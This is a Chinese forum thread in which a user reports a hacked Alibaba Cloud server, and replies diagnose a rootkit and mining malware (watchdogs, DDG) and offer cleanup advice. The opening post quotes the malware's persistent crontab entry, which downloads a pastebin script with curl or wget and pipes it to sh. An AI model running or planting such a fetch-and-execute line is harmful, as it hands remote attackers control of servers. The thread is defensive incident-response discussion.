阿里云服务器被挂马,被写入 crontab 删不掉。ps 命令找不到 nginx PHP 进程信息
hobbyliu 2019-02-21 14:14:13 +08:00 7596 次点击这是一个创建于 2425 天前的主题,其中的信息可能已经有所发展或是发生改变。
*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh
crontab 被写入这段代码。删除后一会又自动加上。
ps 命令看到的进程很奇怪,php nginx 进程找你不到了,但是服务正常。
怀疑 ps 被修改, 已经从其他服务器替换了回来,但是依旧不行。
 | 1 ThirdFlame 2019-02-21 14:27:44 +08:00 可能不止 PS 被替换了啊 watchdogs 还在运行呢。 |
 | 2 dapang1221 2019-02-21 14:32:53 +08:00 alias,查一下是不是 ps 被设置别名,把奇怪的进程 grep 掉了 |
 | 3 hcymk2 2019-02-21 14:35:09 +08:00  1 |
 | 4 cpdyj0 2019-02-21 15:20:08 +08:00 via Android 检查下内核模块,有没有什么奇怪的东西 |
 | 5 huixia0010 2019-02-21 15:37:03 +08:00 有 memcache 吗~有的话,关掉试试~ |
 | 7 rogerchen 2019-02-21 16:06:22 +08:00 via iPhone 重置吧,手工不能打过 rootkit 的 |
 | 8 hobbyliu OP @huixia0010 并没有,只有 redis 怀疑是 redis 注入 shell 但是,redis 进程号找不到。。ps 命令不好使了 |
 | 9 greatbody 2019-02-21 16:34:01 +08:00 用 terraform 来管理基础设置,然后把服务全部都用容器。最后,数据库什么的都用云数据库。 应该会好很多。 |
| 10 ThirdFlame 2019-02-21 17:01:37 +08:00 @hobbyliu ps ls 可能都被替换了。 |
 | 11 c0878 2019-02-21 17:13:34 +08:00 保存数据 重装系统 另外阿里云态势感知可以用一下 |
 | 12 changliwei 2019-02-21 18:51:45 +08:00 可以实时 csysdiag 程序查看, sysdig 这个工具的原理不是读取 /proc/的统计值,通过加载一个内核模块,对内核插入各种探测点,动态采集原始数据,再进行分析,恶意软件的隐身原理对 sysdig 不适用了. top/iotop/lsof/netstat /ps 等工具都是 /proc 下内核统计值工作的工具,很容易被恶意软件的隐藏没法查看。 安装 csysdiag 就可以查看,centos curl -s https://s3.amazonaws.com/download.draios.com/stable/install-sysdig | sudo bash Viewing: Processes For: whole machine Source: Live System Filter: evt.type!=switch PID CPU USER TH VIRT RES FILE NET Command 4101 100.00 1 317M 5M 0 0.00 <NA> 1012 4.00 root 1 118M 19M 0 0.00 csysdig 30087 0.50 1 4G 3G 0 0.00 <NA> 30084 0.50 1 4G 3G 0 0.00 <NA> 29063 0.50 1 3G 2G 0 0.00 <NA> 9387 0.50 1 4G 3G 0 0.00 <NA> 4058 0.50 1 108M 40M 0 1.69K <NA> [root@centos ]# ls -l /prox/4101 total 0 dr-xr-xr-x 2 root root 0 Feb 21 18:43 attr -rw-r--r-- 1 root root 0 Feb 21 18:43 autogroup -r-------- 1 root root 0 Feb 21 18:43 auxv -r--r--r-- 1 root root 0 Feb 21 18:43 cgroup --w------- 1 root root 0 Feb 21 18:43 clear_refs -r--r--r-- 1 root root 0 Feb 21 18:43 cmdline -rw-r--r-- 1 root root 0 Feb 21 18:43 comm -rw-r--r-- 1 root root 0 Feb 21 18:43 coredump_filter -r--r--r-- 1 root root 0 Feb 21 18:43 cpuset lrwxrwxrwx 1 root root 0 Feb 21 18:43 cwd -> / -r-------- 1 root root 0 Feb 21 18:43 environ lrwxrwxrwx 1 root root 0 Feb 21 18:43 exe -> /tmp/ksoftirqds (deleted) |
| 13 hobbyliu OP @changliwei 试了一下,还是进程缺失,php nginx 进程还是看不到 []( https://imgchr.com/i/kWlAxJ) |
 | 14 Acoffice 2019-02-21 22:35:15 +08:00 via Android 今天上午也有个同事问这个问题,楼主如果解决,麻烦贴出解决方案哦 |
| 15 Acoffice 2019-02-21 22:52:23 +08:00 via Android 链接点进去解密可以看到定时任务都执行了什么 |
| 16 Acoffice 2019-02-21 22:53:10 +08:00 via Android 太长,我就不往上贴了 |
| 17 Acoffice 2019-02-21 23:16:16 +08:00 via Android 简单分析了下, 解决点:卸载 curl 命令,然后删除 cron,kill 掉 nohup /tmp/watchdogs >/dev/null 2>&1 进程, 然后再细看解密后都执行了哪些命令,挨个恢复. |
 | 18 abcbuzhiming 2019-02-21 23:46:55 +08:00 兄弟,我和你症状一模一样啊 t/537457 |
| 19 hobbyliu OP @Acoffice 我更改了下 host 127.0.0.1 pastebin.com 基本控制住了,但是没有根治啊。找阿里云客服说也没办法让备份恢复系统盘解决。 |
 | 20 sdksang 2019-02-22 17:31:16 +08:00 大兄弟 中了 DDG 啊 。。 |
 | 22 hyshuang2006 2019-02-22 21:48:48 +08:00 哎...我的 VPS 惨了,连 root 都进不去。 |
| 23 hobbyliu OP @hyshuang2006 你设置的不允许密码登录? |
| 24 hyshuang2006 2019-02-23 20:06:51 +08:00 |
 | 25 metas 2019-02-26 11:26:57 +08:00 |
Select Language